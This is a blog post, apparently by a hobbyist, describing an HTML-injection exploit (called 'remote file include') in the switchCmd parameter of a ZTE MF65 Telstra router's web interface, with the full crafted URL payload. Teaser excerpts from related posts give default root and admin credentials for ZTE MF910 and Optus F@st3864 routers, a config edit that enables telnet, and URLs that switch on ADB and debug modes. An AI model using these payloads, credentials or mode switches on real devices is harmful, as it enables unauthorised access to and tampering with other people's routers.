ZTE(telstra)MF65 -Remote file include-

ZTE(telstra)MF65

Remote file include :

this exploit uses :
http://Your-R-IP/goform/goform_process?goformId=MODE_SWITCH&switchCmd=
and exploits the loose handling of closing html tags because the switchCmd  page  uses a unclosed <title> tag to normally write the switch command and return either success or fail in the page title, this leads us to closing the <tiltle> and starting a new tag, i found <xyz> worked as an arbitrary tag 
, this worked great(you could use anything in there), so we have :
 switchCmd=pagenamegoeshere</title><xyz>

and using the img tag and span tags we get


<img border=0 width=300 height=200 src="https://www.google.com.au/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png"alt="some crap goes here" v:shapes="and here as well"><span><p><a href="http://google.com" target="_blank"><span class="index_toplink">this will take us out of the local net</span></a></span>

then we close out the <xyz>

and finally we use a unclosed <script> to hide the rest of the normal output 
in total we get:

 http://Your-R-IP/goform/goform_process?goformId=MODE_SWITCH&switchCmd=pagenamegoeshere</title><xyz><img border=0 width=300 height=200 src="https://www.google.com.au/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png"alt="some crap goes here" v:shapes="and here as well"><span><p><a href="http://google.com" target="_blank"><span class="index_toplink">this will take us out of the local net</span></a></span></xyz><script> 


we cant use & or # symbols in the scripts so it makes it kinda hard to utilise all of  scripting used by the webserver although 
 this can be used to append # to objects via scripting:
 
<a trans="  ? " href="  ? " data-bind="attr: {href: hash, trans: hash.substring(1)}">
gives href:# ?
and  trans:# ?


till next time

Comments

Post a Comment

Popular posts from this blog

f@st3864 Telnet/Serial

f@st3864 Telnet/Serial R.e F@st3864v2 Optus F@st3864 The quickest way to openly access this routers administration tools is to log in via http://192.168.0.1/main.html?loginuser=0 logging in with the default admin/Y3s0ptus loginuser=0 ***support/support ***loginuser=1 ***user/user*****loginuser=2 ***To Activate telnet*** going to management/system settings " download this file " sysinfo.f24 open the file in notepad the file splits into two sections the section we want is headed by backup config: <?xml version="1.0"?> <DslCpeConfig version="3.0"> and closed by </InternetGatewayDevice> </DslCpeConfig> so by copying all the xml information between these two points and pasting into a new notepad you have created our new backup file, before we save it and close find <X_GVT_Telnet_Enable>FALSE</X_GVT_Telnet_Enable> Change FALSE to TRUE then save the file as backupconfig.xml then use this XML file to update the settings, also i
Read more

ZTE MF910V Root exploit

ZTE MF910/ZTE910B/ZTE MF910V/Telstra MF910v  This guide exists in both linux and windows format Please follow the instructions as per O/S or untill instructions converge |+++++++++++++++++++++++++++++++++++++| Default credentials: For ZTE MF910/ZTE910B/ZTE MF910V/Telstra MF910v root:oelinux123 Web Interface Password: password |+++++++++++++++++++++++++++++++++++++| Getting Setup: Download the mode switch html to run locally: http://lopoteam.com/3AY9 Also ensure you have ADB (Android Debug Bridge) installed on your computer: ADB: Linux: https://dl.google.com/android/repository/platform-tools-latest-linux.zip http://lopoteam.com/37Bw Windows: https://dl.google.com/android/repository/platform-tools-latest-windows.zip http://lopoteam.com/37Ac |+++++++++++++++++++++++++++++++++++++| Lets Begin |+++++++++++++++++++++++++++++++++++++| Plug your device into the computer to download drivers. Linux: Open Terminal cd (*a
Read more

ZTE MF910V Mode Switch / ADB Enable / AT Commands / Debug

ZTE MF910V Mode Switch / ADB Enable / AT Commands / Debug AT mode : /goform/goform_set_cmd_process?goformId=SET_DEVICE_MODE&debug_enable=X Change X to either 0 or 1 this enables and disables qualcomm services, Debub / Adb :  /goform/goform_set_cmd_process?goformId=USB_MODE_SWITCH&usb_mode=X Change X to be the value matching the desired mode. 1-4 is RNDIS 5 is CDC 6 is ADB. or this page is uploaded to any web dir: UPDATED(2017) Download this file: tools.html Upload it to any directory and use it to switch thru modes via html
Read more